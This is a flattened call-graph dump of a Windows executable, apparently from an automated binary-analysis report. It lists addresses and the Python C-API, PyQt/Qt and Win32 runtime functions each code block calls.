7ffb02f1e3c0 7040 7ffb02f1e402 7039->7040 7041 7ffb02f1e41d 7040->7041 7042 7ffb02f1e406 PyLong_FromLong 7040->7042 7043 7ff60b147440 7044 7ff60b14746d 7043->7044 7045 7ff60b147477 _invalid_parameter_noinfo 7044->7045 7046 7ff60b147491 7044->7046 7045->7046 7047 7ffb02fa23c0 7048 7ffb02fa23fd 7047->7048 7049 7ffb02fa2405 ?updateDirection@QSequentialAnimationGroup@@MEAAXW4Direction@QAbstractAnimation@@ 7048->7049 7050 7ffb02fa2420 7048->7050 7051 7ff60b12dc48 7052 7ff60b12dc50 __vcrt_InitializeCriticalSectionEx 7051->7052 7053 7ff60b12dc70 7052->7053 7054 7ff60b12dc81 7052->7054 7053->7052 7055 7ff60b12dc7d 7053->7055 7057 7ff60b12dc90 7054->7057 7058 7ff60b12dcbb 7057->7058 7059 7ff60b12dc9e DeleteCriticalSection 7058->7059 7060 7ff60b12dcbf 7058->7060 7059->7058 7060->7055 7064 7ff60b137c4c GetFullPathNameW 7065 7ff60b137c7f GetLastError 7064->7065 7067 7ff60b137c95 7064->7067 7066 7ff60b137c8c 7065->7066 7067->7066 7068 7ff60b137cef GetFullPathNameW 7067->7068 7068->7065 7068->7066 7069 7ffb02f2c3d0 7070 7ffb02f2c455 7069->7070 7071 7ffb02f2c4d0 7070->7071 7072 7ffb03062300 2 API calls 7070->7072 7073 7ffb02f2c46b ?fileName@QUrl@@QEBA?AVQString@@V?$QFlags@W4ComponentFormattingOption@QUrl@@@@ 7072->7073 7074 7ffb02f2c4a6 7073->7074 6765 7ffb02fe65d0 6766 7ffb02fe6616 6765->6766 6767 7ffb02fe661a ?exists@QFile@ PyBool_FromLong 6766->6767 6768 7ffb02fe6634 6766->6768 6769 7ffb02fe6677 ?exists@QFile@@SA_NAEBVQString@@ 6768->6769 6770 7ffb02fe66b2 6768->6770 6771 7ffb02fe66a4 PyBool_FromLong 6769->6771 7093 7ffb02ff03d0 7094 7ffb02ff0412 7093->7094 7095 7ffb02ff0416 ?isEmpty@QJsonDocument@ PyBool_FromLong 7094->7095 7096 7ffb02ff042f 7094->7096 6891 7ffb02f951d0 6892 7ffb02f9520e 6891->6892 6893 7ffb02f95213 ?event@QObject@@UEAA_NPEAVQEvent@@ 6892->6893 6894 7ffb02f9522f 6892->6894 7097 7ffb02f8a3d0 7098 7ffb02f8a3d9 7097->7098 7100 7ffb02f8a413 7097->7100 7099 7ffb02f8a400 ??1QStorageInfo@@QEAA 7098->7099 7098->7100 7099->7099 7099->7100 7113 7ffb02f803e0 7114 7ffb02f80400 7113->7114 7115 7ffb02f8047b ?timerEvent@QTimeLine@@MEAAXPEAVQTimerEvent@@ 7114->7115 7116 7ffb02f80483 7114->7116 7115->7116 7117 7ffb02f863e0 7118 7ffb02f863f8 7117->7118 7119 7ffb02f86402 ?qHash@@YAIAEBVQUrlQuery@@I 7118->7119 7120 7ffb02f863fd 7118->7120 7121 7ff60b13ac9c 7125 7ff60b13accd 7121->7125 7122 7ff60b13ad1c 7123 7ff60b13eb98 HeapAlloc 7122->7123 7126 7ff60b13ad29 7123->7126 7125->7122 7125->7125 7127 7ff60b13ad66 7125->7127 7130 7ff60b13546c EnterCriticalSection 7125->7130 7131 7ff60b135478 LeaveCriticalSection 7125->7131 7126->7127 7132 7ff60b13546c EnterCriticalSection 7126->7132 7133 7ffb02f383e0 7134 7ffb02f38441 7133->7134 7135 7ffb02f3848b 7134->7135 7136 7ffb02f38445 ?setCodec@QXmlStreamWriter@@QEAAXPEAVQTextCodec@@ 7134->7136 7138 7ffb02f3850d 7135->7138 7139 7ffb02f384e0 ?setCodec@QXmlStreamWriter@@QEAAXPEBD 7135->7139 7137 7ffb02f38474 7136->7137 7139->7137 7140 7ffb02f38502 _Py_Dealloc 7139->7140 7140->7137 7141 7ffb030003e0 7142 7ffb03000432 7141->7142 7143 7ffb03000436 ?remove@QByteArray@@QEAAAEAV1@HH 7142->7143 7145 7ffb03000469 7142->7145 7144 7ffb03000464 7143->7144 7146 7ffb02fec3e0 7147 7ffb02fec455 7146->7147 7148 7ffb02fec459 ?encodeData@QAbstractItemModel@@IEBAXAEBV?$QList@VQModelIndex@@@@AEAVQDataStream@@ 7147->7148 7149 7ffb02fec4ae 7147->7149 7150 7ffb02fec495 7148->7150 7151 7ffb02f9a3e0 7152 7ffb02f9a416 7151->7152 7153 7ffb02f9a41b ?pos@QIODevice@ 7152->7153 7154 7ffb02f9a42f 7152->7154 7159 7ffb02f8c3e0 PyObject_GetIter 7160 7ffb02f8c464 7159->7160 7161 7ffb02f8c40b PyErr_Clear 7159->7161 7166 7ffb03062300 2 API calls 7160->7166 7176 7ffb02f8c5b5 7160->7176 7162 7ffb02f8c416 7161->7162 7163 7ffb02f8c435 7161->7163 7164 7ffb02f8c425 PyType_GetFlags 7162->7164 7165 7ffb02f8c41c _Py_Dealloc 7162->7165 7164->7163 7165->7164 7167 7ffb02f8c481 ?sharedNull@QArrayData@@SAPEAU1 PyErr_Clear PyIter_Next 7166->7167 7168 7ffb02f8c55a PyErr_Occurred 7167->7168 7181 7ffb02f8c4aa 7167->7181 7169 7ffb02f8c634 7168->7169 7172 7ffb02f8c569 7168->7172 7170 7ffb02f8c63a _Py_Dealloc 7169->7170 7169->7176 7170->7176 7171 7ffb02f8c585 ?deallocate@QArrayData@@SAXPEAU1@_K1 7173 7ffb02f8c599 7171->7173 7172->7171 7172->7173 7173->7176 7179 7ffb02f8c5ac _Py_Dealloc 7173->7179 7174 7ffb02f8c4c0 PyErr_Occurred 7175 7ffb02f8c5da PyErr_ExceptionMatches 7174->7175 7174->7181 7177 7ffb02f8c61c 7175->7177 7178 7ffb02f8c5ee PyErr_Format 7175->7178 7177->7172 7180 7ffb02f8c626 _Py_Dealloc 7177->7180 7178->7177 7179->7176 7180->7172 7181->7174 7183 7ffb02f8c533 _Py_Dealloc 7181->7183 7184 7ffb02f8c53c PyErr_Clear PyIter_Next 7181->7184 7183->7184 7184->7168 7184->7181 7185 7ffb02fbc3e0 7186 7ffb02fbc420 7185->7186 7187 7ffb02fbc424 ?disconnect@QObject@@SA_NAEBVConnection@QMetaObject@@ PyBool_FromLong 7186->7187 7189 7ffb02fbc43e 7186->7189 7188 7ffb02fbc489 7189->7188 7192 7ffb03058430 PyEval_SaveThread ?disconnect@QObject@@SA_NPEBV1@PEBD01 PyEval_RestoreThread 7189->7192 7191 7ffb02fbc483 7193 7ffb0305846c 7192->7193 7194 7ffb03058478 PyErr_SetString 7192->7194 7195 7ffb03058491 ??0QByteArray@@QEAA 7193->7195 7194->7195 7196 7ffb0305ccb0 7195->7196 7197 7ffb030584a7 ??1QByteArray@@QEAA 7196->7197 7197->7191 7198 7ffb02f503f0 7200 7ffb02f5041c 7198->7200 7199 7ffb02f5051d 7200->7199 7201 7ffb02f504ef ?rowCount@QSortFilterProxyModel@@UEBAHAEBVQModelIndex@@ PyLong_FromLong 7200->7201 7202 7ffb02f50506 PyLong_FromLong 7200->7202 7204 7ffb02f483f0 7205 7ffb02f48410 7204->7205 7206 7ffb02f484a1 ?setSourceModel@QTransposeProxyModel@@UEAAXPEAVQAbstractItemModel@@ 7205->7206 7207 7ffb02f484a9 7205->7207 7206->7207 7208 7ff60b1354ac 7209 7ff60b1354fa 7208->7209 7214 7ff60b1354d6 7208->7214 7210 7ff60b1354ff 7209->7210 7213 7ff60b135554 7209->7213 7211 7ff60b13d5fc _fread_nolock HeapAlloc 7210->7211 7210->7214 7211->7214 7212 7ff60b135577 GetLastError 7212->7214 7213->7212 7215 7ff60b13d5fc _fread_nolock HeapAlloc 7213->7215 7216 7ff60b1355b2 7213->7216 7215->7216 7216->7212 7216->7214 7217 7ffb02f303f0 7218 7ffb02f3043a 7217->7218 7219 7ffb02f3043e ?setRealNumberPrecision@QTextStream@@QEAAXH 7218->7219 7220 7ffb02f30463 7218->7220 7221 7ffb02f323f0 7222 7ffb02f32432 7221->7222 7223 7ffb02f3244e 7222->7223 7224 7ffb02f32436 ?propertyOffset@QMetaObject@ PyLong_FromLong 7222->7224 7225 7ffb02fda3f0 7226 7ffb02fda44f 7225->7226 7227 7ffb02fda4c7 7226->7227 7228 7ffb03062300 2 API calls 7226->7228 7229 7ffb02fda462 ?partsFromDate@QCalendar@@QEBA?AUYearMonthDay@1@VQDate@@ 7228->7229 7230 7ffb02fda4a3 7229->7230 7231 7ffb02ff63f0 7232 7ffb02ff6432 7231->7232 7233 7ffb02ff646d 7232->7233 7234 7ffb03062300 2 API calls 7232->7234 7235 7ffb02ff6440 ?methodSignature@QMetaMethod@@QEBA?AVQByteArray@ 7234->7235 7236 7ffb02ff6468 7235->7236 7241 7ffb02f66400 7242 7ffb02f66441 7241->7242 7243 7ffb02f66464 7242->7243 7244 7ffb02f66445 7242->7244 7247 7ffb02f664ab 7243->7247 7251 7ffb02f664d2 7243->7251 7245 7ffb03062300 2 API calls 7244->7245 7246 7ffb02f6644f 7245->7246 7248 7ffb03062300 2 API calls 7247->7248 7249 7ffb02f664b5 7248->7249 7250 7ffb02f66540 7251->7250 7252 7ffb03062300 2 API calls 7251->7252 7253 7ffb02f66525 7252->7253 7254 7ffb02f52400 7255 7ffb02f52429 7254->7255 7256 7ffb02f52431 7255->7256 7257 7ffb02f5247b ??8QXmlStreamNamespaceDeclaration@@QEBA_NAEBV0@ PyBool_FromLong 7255->7257 7258 7ffb02f524a5 7255->7258 7259 7ffb02f524bb 7258->7259 7260 7ffb02f524b5 _Py_Dealloc 7258->7260 7260->7259 7294 7ffb02f26400 7295 7ffb02f2645e 7294->7295 7296 7ffb02f26462 ?addTransition@QState@@QEAAXPEAVQAbstractTransition@@ 7295->7296 7297 7ffb02f26489 7295->7297 7298 7ffb02f26591 7297->7298 7299 7ffb02f264e3 ??0QByteArray@@QEAA 7297->7299 7301 7ffb02f2660e 7298->7301 7302 7ffb02f265de ?addTransition@QState@@QEAAPEAVQAbstractTransition@@PEAVQAbstractState@@ 7298->7302 7300 7ffb02f264fe 7299->7300 7303 7ffb02f26502 ?constData@QByteArray@ ?addTransition@QState@@QEAAPEAVQSignalTransition@@PEBVQObject@@PEBDPEAVQAbstractState@@ 7300->7303 7304 7ffb02f26526 7300->7304 7306 7ffb02f26606 7302->7306 7305 7ffb02f26542 7303->7305 7304->7305 7307 7ffb02f2655f ??1QByteArray@@QEAA 7304->7307 7308 7ffb02f26574 ??1QByteArray@@QEAA 7304->7308 7305->7307 7308->7298 7310 7ffb03012410 7311 7ffb03012430 7310->7311 7312 7ffb030124bd 7311->7312 7313 7ffb03012490 ?submit@QAbstractProxyModel@ PyBool_FromLong 7311->7313 7314 7ffb030124a5 PyBool_FromLong 7311->7314 7320 7ffb02fe4400 7321 7ffb02fe447e 7320->7321 7322 7ffb02fe4482 7321->7322 7323 7ffb02fe44bc 7321->7323 7324 7ffb03062300 2 API calls 7322->7324 7326 7ffb02fe452a 7323->7326 7327 7ffb02fe4584 7323->7327 7325 7ffb02fe448c ?toString@QDateTime@@QEBA?AVQString@@W4DateFormat@Qt@@ 7324->7325 7330 7ffb02fe44b7 7325->7330 7328 7ffb03062300 2 API calls 7326->7328 7327->7330 7331 7ffb03062300 2 API calls 7327->7331 7329 7ffb02fe4534 ?toString@QDateTime@@QEBA?AVQString@@AEBV2@ 7328->7329 7329->7330 7332 7ffb02fe4611 ?toString@QDateTime@@QEBA?AVQString@@AEBV2@VQCalendar@@ 7331->7332 7332->7330 7333 7ff60b143480 GetProcessHeap 7334 7ffb02fcc400 7335 7ffb02fcc485 7334->7335 7336 7ffb02fcc489 ?isEmpty@QDir@@QEBA_NV?$QFlags@W4Filter@QDir@@@@ 7335->7336 7337 7ffb02fcc4e0 7335->7337 7338 7ffb02fcc4c8 PyBool_FromLong 7336->7338 7339 7ff60b126c80 7340 7ff60b126cb0 7339->7340 7341 7ff60b124560 2 API calls 7340->7341 7342 7ff60b126cb8 7341->7342 7343 7ffb02ff2400 7344 7ffb02ff2442 7343->7344 7345 7ffb02ff2446 ?handle@QFileDevice@ PyLong_FromLong 7344->7345 7346 7ffb02ff245e 7344->7346 7347 7ffb02f64410 7348 7ffb02f64489 7347->7348 7349 7ffb02f644ec 7348->7349 7350 7ffb03062300 2 API calls 7348->7350 7351 7ffb02f6449f ??0QSystemSemaphore@@QEAA@AEBVQString@@HW4AccessMode@0@ 7350->7351 7352 7ffb02f644d9 7351->7352 7353 7ffb02f5c410 7354 7ffb02f5c452 7353->7354 7355 7ffb02f5c48d 7354->7355 7356 7ffb03062300 2 API calls 7354->7356 7357 7ffb02f5c460 ?filePath@QTranslator@@QEBA?AVQString@ 7356->7357 7358 7ffb02f5c488 7357->7358 6436 7ffb03056000 6437 7ffb03056017 PyErr_Fetch 6436->6437 6438 7ffb0305638a 6436->6438 6439 7ffb0305604e PySys_GetObject 6437->6439 6440 7ffb0305603a PySys_GetObject 6437->6440 6441 7ffb03056097 6439->6441 6442 7ffb03056064 PyErr_Restore PyErr_Print 6439->6442 6440->6439 6443 7ffb030560ae PyImport_ImportModule 6441->6443 6444 7ffb030560e9 6441->6444 6443->6444 6445 7ffb030560c3 PyObject_GetAttrString 6443->6445 6446 7ffb030560f4 PySys_GetObject 6444->6446 6461 7ffb03056155 6444->6461 6445->6444 6448 7ffb030560e0 _Py_Dealloc 6445->6448 6447 7ffb03056161 PyErr_Restore PyErr_Print ??0QByteArray@@QEAA@PEBDH 6446->6447 6449 7ffb03056109 PyObject_CallObject 6446->6449 6450 7ffb0305631f 6 API calls 6447->6450 6451 7ffb030561a9 PySys_SetObject 6447->6451 6448->6444 6449->6447 6452 7ffb03056120 PySys_SetObject 6449->6452 6450->6438 6454 7ffb030561cd PyObject_CallMethod 6451->6454 6455 7ffb030561c4 _Py_Dealloc 6451->6455 6452->6447 6453 7ffb03056137 6452->6453 6456 7ffb0305613d _Py_Dealloc 6453->6456 6457 7ffb03056146 6453->6457 6458 7ffb0305630b 6454->6458 6459 7ffb030561ec PyObject_CallMethod 6454->6459 6455->6454 6456->6457 6460 7ffb0305614c _Py_Dealloc 6457->6460 6457->6461 6458->6450 6462 7ffb03056316 _Py_Dealloc 6458->6462 6463 7ffb0305620c 6459->6463 6464 7ffb0305621e PyObject_GetAttrString 6459->6464 6460->6461 6461->6447 6462->6450 6465 7ffb03056212 _Py_Dealloc 6463->6465 6466 7ffb0305621b 6463->6466 6467 7ffb030562f7 6464->6467 6468 7ffb0305623a PyUnicode_AsUTF8String 6464->6468 6465->6466 6466->6464 6467->6458 6471 7ffb03056302 _Py_Dealloc 6467->6471 6469 7ffb030562e2 6468->6469 6470 7ffb03056254 PyBytes_AsString PyUnicode_AsEncodedString 6468->6470 6469->6467 6474 7ffb030562ee _Py_Dealloc 6469->6474 6472 7ffb0305627d PyBytes_Size PyBytes_AsString ??0QByteArray@@QEAA@PEBDH ??4QByteArray@@QEAAAEAV0@$$QEAV0@ ??1QByteArray@@QEAA 6470->6472 6473 7ffb030562ce 6470->6473 6471->6458 6472->6473 6475 7ffb030562c5 _Py_Dealloc 6472->6475 6473->6469 6476 7ffb030562d9 _Py_Dealloc 6473->6476 6474->6467 6475->6473 6476->6469 7359 7ffb02f6c410 7360 7ffb02f6c436 7359->7360 7361 7ffb03062300 2 API calls 7360->7361 7363 7ffb02f6c46c 7360->7363 7362 7ffb02f6c444 ?staticInstances@QPluginLoader@@SA?AV?$QList@PEAVQObject@@@ 7361->7362 7364 7ffb02f6c467 7362->7364 7365 7ffb02f76410 7366 7ffb02f76462 7365->7366 7368 7ffb02f76426 7365->7368 7367 7ffb02f76452 ?free_helper@QHashData@@QEAAXP6AXPEAUNode@1@@Z 7367->7366 7368->7366 7368->7367 7381 7ffb02ffe410 7382 7ffb02ffe452 7381->7382 7383 7ffb02ffe48d 7382->7383 7384 7ffb03062300 2 API calls 7382->7384 7385 7ffb02ffe460 ?result@QMessageAuthenticationCode@@QEBA?AVQByteArray@ 7384->7385 7386 7ffb02ffe488 7385->7386 7387 7ffb02f58420 7388 7ffb02f58440 7387->7388 7389 7ffb02f584f3 7388->7389 7390 7ffb02f584a6 PyEval_SaveThread 7388->7390 7391 7ffb02f584c2 ?writeData@QFileDevice@@MEAA_JPEBD_J 7390->7391 7392 7ffb02f584ca 7390->7392 7393 7ffb02f584d3 PyEval_RestoreThread PyLong_FromLongLong 7391->7393 7392->7393 7394 7ffb02f7a420 7395 7ffb02f7a462 7394->7395 7396 7ffb02f7a487 7395->7396 7397 7ffb02f7a466 ?endMoveColumns@QAbstractItemModel@ 7395->7397 7398 7ffb02f86420 7399 7ffb02f86462 7398->7399 7400 7ffb02f8647f 7399->7400 7401 7ffb02f86466 ?bytesFree@QStorageInfo@ PyLong_FromLongLong 7399->7401 7402 7ffb02f1c420 7403 7ffb02f1c440 7402->7403 7404 7ffb02f1c4bb ?onEntry@QStateMachine@@MEAAXPEAVQEvent@@ 7403->7404 7405 7ffb02f1c4c3 7403->7405 7404->7405 7406 7ffb02f1a420 7407 7ffb02f1a4a0 7406->7407 7408 7ffb02f1a4a4 ?postEvent@QStateMachine@@QEAAXPEAVQEvent@@W4EventPriority@1@ 7407->7408 7409 7ffb02f1a4d8 7407->7409 7410 7ffb02f18420 7411 7ffb02f18462 7410->7411 7412 7ffb02f1847f 7411->7412 7413 7ffb02f18466 ?isRunning@QStateMachine@ PyBool_FromLong 7411->7413 7414 7ff60b1404dc 7415 7ff60b1404f3 7414->7415 7417 7ff60b140520 7414->7417 7416 7ff60b140578 __crtLCMapStringW 7415->7416 7415->7417 7416->7417 7418 7ffb02f14420 PyEval_SaveThread ?thread@QObject@@QEBAPEAVQThread@ ?currentThread@QThread@@SAPEAV1 7419 7ffb02f14452 7418->7419 7420 7ffb02f14468 ?deleteLater@QObject@ 7418->7420 7421 7ffb02f14471 PyEval_RestoreThread 7419->7421 7420->7421 7422 7ffb02f3c420 7423 7ffb02f3c462 7422->7423 7424 7ffb02f3c47e 7423->7424 7425 7ffb02f3c466 ?available@QSemaphore@ PyLong_FromLong 7423->7425 7426 7ffb02f44420 7427 7ffb02f44462 7426->7427 7428 7ffb02f4448c 7427->7428 7429 7ffb02f44466 ?error@QProcess@@QEBA?AW4ProcessError@1 7427->7429 7430 7ffb02f44487 7429->7430 7431 7ffb02f34420 7432 7ffb02f34440 7431->7432 7433 7ffb02f34425 ??1QTextEncoder@@QEAA 7431->7433 7433->7432 7434 7ffb02f36420 7435 7ffb02f3645b 7434->7435 7436 7ffb02f36441 PyType_GetFlags 7434->7436 7437 7ffb03062300 2 API calls 7435->7437 7438 7ffb02f36481 PyDict_Next 7437->7438 7449 7ffb02f36664 7438->7449 7453 7ffb02f364b7 7438->7453 7439 7ffb02f364d2 PyErr_Occurred 7440 7ffb02f36717 PyErr_ExceptionMatches 7439->7440 7439->7453 7441 7ffb02f3675b 7440->7441 7442 7ffb02f3672b PyErr_Format 7440->7442 7443 7ffb02f36779 ?free_helper@QHashData@@QEAAXP6AXPEAUNode@1@@Z 7441->7443 7441->7449 7442->7441 7443->7449 7444 7ffb02f366a5 PyErr_Format 7447 7ffb02f366df 7444->7447 7448 7ffb02f366f3 ?free_helper@QHashData@@QEAAXP6AXPEAUNode@1@@Z 7444->7448 7447->7448 7447->7449 7448->7449 7450 7ffb02f3657a ??4QByteArray@@QEAAAEAV0@AEBV0@ 7450->7453 7451 7ffb02f365ea ?allocateNode@QHashData@@QEAAPEAXH ??0QByteArray@@QEAA@AEBV0@ 7451->7453 7452 7ffb02f36598 ?rehash@QHashData@@QEAAXH 7452->7453 7453->7439 7453->7444 7453->7450 7453->7451 7453->7452 7454 7ffb02f36644 PyDict_Next 7453->7454 7454->7449 7454->7453 6772 7ff60b12bae0 6773 7ff60b12bb0e 6772->6773 6774 7ff60b12baf5 6772->6774 6774->6773 6777 7ff60b13d5fc 6774->6777 6775 7ff60b12bb6e 6779 7ff60b13d645 6777->6779 6780 7ff60b13d60b 6777->6780 6778 7ff60b13d62e HeapAlloc 6778->6779 6778->6780 6779->6775 6780->6778 6780->6779 7455 7ffb02fd0420 7456 7ffb02fd0463 7455->7456 7457 7ffb02fd0467 ?setApplicationVersion@QCoreApplication@@SAXAEBVQString@@ 7456->7457 7458 7ffb02fd04a6 7456->7458 7459 7ffb02fd0490 7457->7459 7460 7ffb02f9c420 7461 7ffb02f9c466 7460->7461 7462 7ffb02f9c46b ?removeRows@QStringListModel@@UEAA_NHHAEBVQModelIndex@@ 7461->7462 7463 7ffb02f9c47e 7461->7463 7462->7463 7464 7ffb02fa4420 7465 7ffb02fa445a 7464->7465 7466 7ffb02fa447c 7465->7466 7467 7ffb02fa445e ?qChecksum@@YAGPEBDI PyLong_FromUnsignedLong 7465->7467 7468 7ffb02fa44e4 7466->7468 7469 7ffb02fa44c1 ?qChecksum@@YAGPEBDIW4ChecksumType@Qt@@ PyLong_FromUnsignedLong 7466->7469 7470 7ffb02fc2420 7471 7ffb02fc246e 7470->7471 7472 7ffb02fc2472 ?intersects@QItemSelectionRange@@QEBA_NAEBV1@ PyBool_FromLong 7471->7472 7473 7ffb02fc2490 7471->7473 7474 7ffb02fae420 ??4QEvent@@QEAAAEAV0@AEBV0@ 7475 7ffb02fb4420 7476 7ffb02fb4472 7475->7476 7477 7ffb02fb4476 PyEval_SaveThread ?fatal@QMessageLogger@ PyEval_RestoreThread 7476->7477 7478 7ffb02fb44d0 7476->7478 7479 7ffb02fb44b4 _Py_Dealloc 7477->7479 7480 7ffb02fb44ba 7477->7480 7479->7480 7481 7ffb02f84430 7482 7ffb02f84472 7481->7482 7483 7ffb03062300 2 API calls 7482->7483 7484 7ffb02f844ad 7482->7484 7485 7ffb02f84480 ?startValue@QVariantAnimation@@QEBA?AVQVariant@ 7483->7485 7486 7ffb02f844a8 7485->7486 7487 7ff60b1394ec 7489 7ff60b139515 7487->7489 7490 7ff60b13952e 7487->7490 7488 7ff60b13eb98 HeapAlloc 7488->7490 7490->7488 7490->7489 7491 7ffb03008420 7492 7ffb0300844d 7491->7492 7493 7ffb03008460 ??0QModelIndex@@QEAA 7492->7493 7494 7ffb03008473 7492->7494 7493->7493 7493->7494 7495 7ff60b147cf0 7496 7ff60b147d05 CreateFileW 7495->7496 7497 7ff60b147d33 7495->7497 7496->7497 7498 7ff60b127cf0 7499 7ff60b127d05 7498->7499 7500 7ff60b1245c0 19 API calls 7499->7500 7501 7ff60b127d2b 7500->7501 7502 7ff60b1245c0 19 API calls 7501->7502 7505 7ff60b127d52 7501->7505 7503 7ff60b127d42 7502->7503 7504 7ff60b127d4d 7503->7504 7507 7ff60b127d5c 7503->7507 7506 7ff60b13004c 6 API calls 7504->7506 7506->7505 7509 7ff60b13039c _fread_nolock 18 API calls 7507->7509 7512 7ff60b127dbf 7507->7512 7508 7ff60b13004c 6 API calls 7510 7ff60b127de7 7508->7510 7509->7507 7511 7ff60b13004c 6 API calls 7510->7511 7511->7505 7512->7508 7513 7ffb02fee430 7514 7ffb02fee456 7513->7514 7515 7ffb02fee48c 7514->7515 7516 7ffb03062300 2 API calls 7514->7516 7517 7ffb02fee464 ?currentDateTimeUtc@QDateTime@@SA?AV1 7516->7517 7518 7ffb02fee487 7517->7518 7522 7ff60b13d4f4 7527 7ff60b13d4a8 7522->7527 7524 7ff60b13d506 7525 7ff60b13d5fc _fread_nolock HeapAlloc 7524->7525 7526 7ff60b13d565 7524->7526 7525->7526 7528 7ff60b13d4bb 7527->7528 7530 7ff60b13d4d7 7528->7530 7531 7ff60b13a47c 7528->7531 7530->7524 7532 7ff60b13a485 7531->7532 7533 7ff60b13a49a 7531->7533 7534 7ff60b13a48a _invalid_parameter_noinfo 7532->7534 7533->7530 7534->7533 7535 7ffb02f8e430 7537 7ffb02f8e43d 7535->7537 7536 7ffb02f8e4aa 7537->7536 7538 7ffb02f8e492 ?dispose@QListData@@SAXPEAUData@1@ 7537->7538 7539 7ffb02f8e480 ??1QFileInfo@@QEAA 7537->7539 7538->7536 7539->7538 7539->7539 7544 7ffb02f5a440 7545 7ffb02f5a49d 7544->7545 7546 7ffb02f5a4a1 7545->7546 7549 7ffb02f5a509 7545->7549 7547 7ffb03062300 2 API calls 7546->7547 7550 7ffb02f5a4b0 7547->7550 7548 7ffb02f5a52c 7552 7ffb02f5a53c PyErr_Clear 7548->7552 7553 7ffb02f5a535 7548->7553 7549->7548 7551 7ffb02f5a521 _Py_Dealloc 7549->7551 7551->7548 7554 7ffb02f12440 7555 7ffb02f12497 7554->7555 7556 7ffb02f1249b ?mapping@QSignalMapper@@QEBAPEAVQObject@@H 7555->7556 7557 7ffb02f124cd 7555->7557 7558 7ffb02f124c2 7556->7558 7559 7ffb02f1257d 7557->7559 7560 7ffb02f1252a ?mapping@QSignalMapper@@QEBAPEAVQObject@@AEBVQString@@ 7557->7560 7562 7ffb02f125fd 7559->7562 7563 7ffb02f125ca ?mapping@QSignalMapper@@QEBAPEAVQObject@@PEAVQWidget@@ 7559->7563 7561 7ffb02f12558 7560->7561 7565 7ffb02f1267d 7562->7565 7566 7ffb02f1264a ?mapping@QSignalMapper@@QEBAPEAVQObject@@PEAV2@ 7562->7566 7564 7ffb02f125f2 7563->7564 7567 7ffb02f12672 7566->7567 7568 7ffb0300c450 7569 7ffb0300c49a 7568->7569 7570 7ffb0300c4da 7569->7570 7571 7ffb03062300 2 API calls 7569->7571 7572 7ffb0300c4a8 ?chopped@QByteArray@@QEBA?AV1@H 7571->7572 7573 7ffb0300c4d5 7572->7573 7574 7ffb02f3e440 7575 7ffb02f3e48a 7574->7575 7576 7ffb02f3e48e ?setNamespaceProcessing@QXmlStreamReader@@QEAAX_N 7575->7576 7577 7ffb02f3e4b4 7575->7577 7578 7ffb02f3a440 7579 7ffb02f3a4e5 7578->7579 7580 7ffb02f3a456 7578->7580 7580->7579 7581 7ffb02f3a4d2 ?dispose@QListData@@SAXPEAUData@1@ 7580->7581 7582 7ffb02f3a4c0 ??1QPersistentModelIndex@@QEAA 7580->7582 7581->7579 7582->7581 7582->7582 7583 7ffb02f46440 7584 7ffb02f4649f 7583->7584 7585 7ffb02f464f0 7584->7585 7586 7ffb02f464a3 ?setErrorString@QIODevice@@IEAAXAEBVQString@@ 7584->7586 7587 7ffb02f464da 7586->7587 7588 7ffb02fdc440 7589 7ffb02fdc523 7588->7589 7590 7ffb02fdc657 7589->7590 7591 7ffb03062300 2 API calls 7589->7591 7592 7ffb02fdc545 ?isNull@QByteArray@ 7591->7592 7593 7ffb02fdc559 ?constData@QByteArray@ 7592->7593 7594 7ffb02fdc565 ?dateTimeToString@QCalendar@@QEBA?AVQString@@VQStringView@@AEBVQDateTime@@AEBVQDate@@AEBVQTime@@AEBVQLocale@@ 7592->7594 7593->7594 7595 7ffb02fdc5cd 7594->7595 7596 7ffb02fe2440 7597 7ffb02fe2495 7596->7597 7598 7ffb02fe2499 ?setTransitionType@QAbstractTransition@@QEAAXW4TransitionType@1@ 7597->7598 7599 7ffb02fe24be 7597->7599 7613 7ffb02fe8440 7614 7ffb02fe8482 7613->7614 7615 7ffb02fe848a PyEval_SaveThread ?sender@QObject@@IEBAPEAV1 PyEval_RestoreThread 7614->7615 7616 7ffb02fe850e 7614->7616 7617 7ffb02fe84be 7615->7617 6795 7ffb02fa1a40 6796 7ffb02fa1a7e 6795->6796 6797 7ffb02fa1a86 ?timerEvent@QTimer@@MEAAXPEAVQTimerEvent@@ 6796->6797 6798 7ffb02fa1aa2 6796->6798 7621 7ffb02f8a440 7622 7ffb02f8a49d 7621->7622 7623 7ffb02f8a4e9 7622->7623 7624 7ffb03062300 2 API calls 7622->7624 7625 7ffb02f8a4b0 ??0QVariantAnimation@@QEAA@PEAVQObject@@ 7624->7625 7626 7ffb02fa8440 7627 7ffb02fa8460 7626->7627 7628 7ffb02fa8503 7627->7628 7629 7ffb02fa84bc PyEval_SaveThread 7627->7629 7630 7ffb02fa84da 7629->7630 7631 7ffb02fa84d2 ?setHeaderData@QAbstractItemModel@@UEAA_NHW4Orientation@Qt@@AEBVQVariant@@H 7629->7631 7632 7ffb02fa84e3 PyEval_RestoreThread PyBool_FromLong 7630->7632 7631->7632 7641 7ff60b12dcc8 7642 7ff60b12ddb2 7641->7642 7648 7ff60b12dd0c 7641->7648 7643 7ff60b12dd3a LoadLibraryExW 7645 7ff60b12ddd9 7643->7645 7646 7ff60b12dd5b GetLastError 7643->7646 7644 7ff60b12ddf9 GetProcAddress 7644->7642 7645->7644 7647 7ff60b12ddf0 FreeLibrary 7645->7647 7646->7648 7647->7644 7648->7642 7648->7643 7648->7644 7649 7ff60b12dd7d LoadLibraryExW 7648->7649 7649->7645 7649->7648 7650 7ff60b12f4c8 7653 7ff60b12fc90 7650->7653 7652 7ff60b12f4f1 7654 7ff60b12fcb1 7653->7654 7655 7ff60b12fce6 7653->7655 7654->7655 7657 7ff60b13a4a4 7654->7657 7655->7652 7660 7ff60b13a4b1 7657->7660 7658 7ff60b13a4c7 _invalid_parameter_noinfo 7659 7ff60b13a4ce 7658->7659 7659->7655 7660->7658 7660->7659 7661 7ffb03062440 7662 7ffb03062449 7661->7662 7663 7ffb03062454 7662->7663 7664 7ffb03062dd8 IsProcessorFeaturePresent 7662->7664 7665 7ffb03062df0 7664->7665 7666 7ffb03062df7 capture_previous_context 7664->7666 7665->7666 7667 7ffb03062ea5 7666->7667 7668 7ffb02f60450 7669 7ffb02f60472 7668->7669 7670 7ffb02f6047a 7669->7670 7671 7ffb02f604bf PyBool_FromLong 7669->7671 7672 7ffb02f604ec 7669->7672 7673 7ffb02f60502 7672->7673 7674 7ffb02f604fc _Py_Dealloc 7672->7674 7674->7673 7684 7ffb02f4a450 7685 7ffb02f4a470 7684->7685 7686 7ffb02f4a523 7685->7686 7687 7ffb02f4a4d6 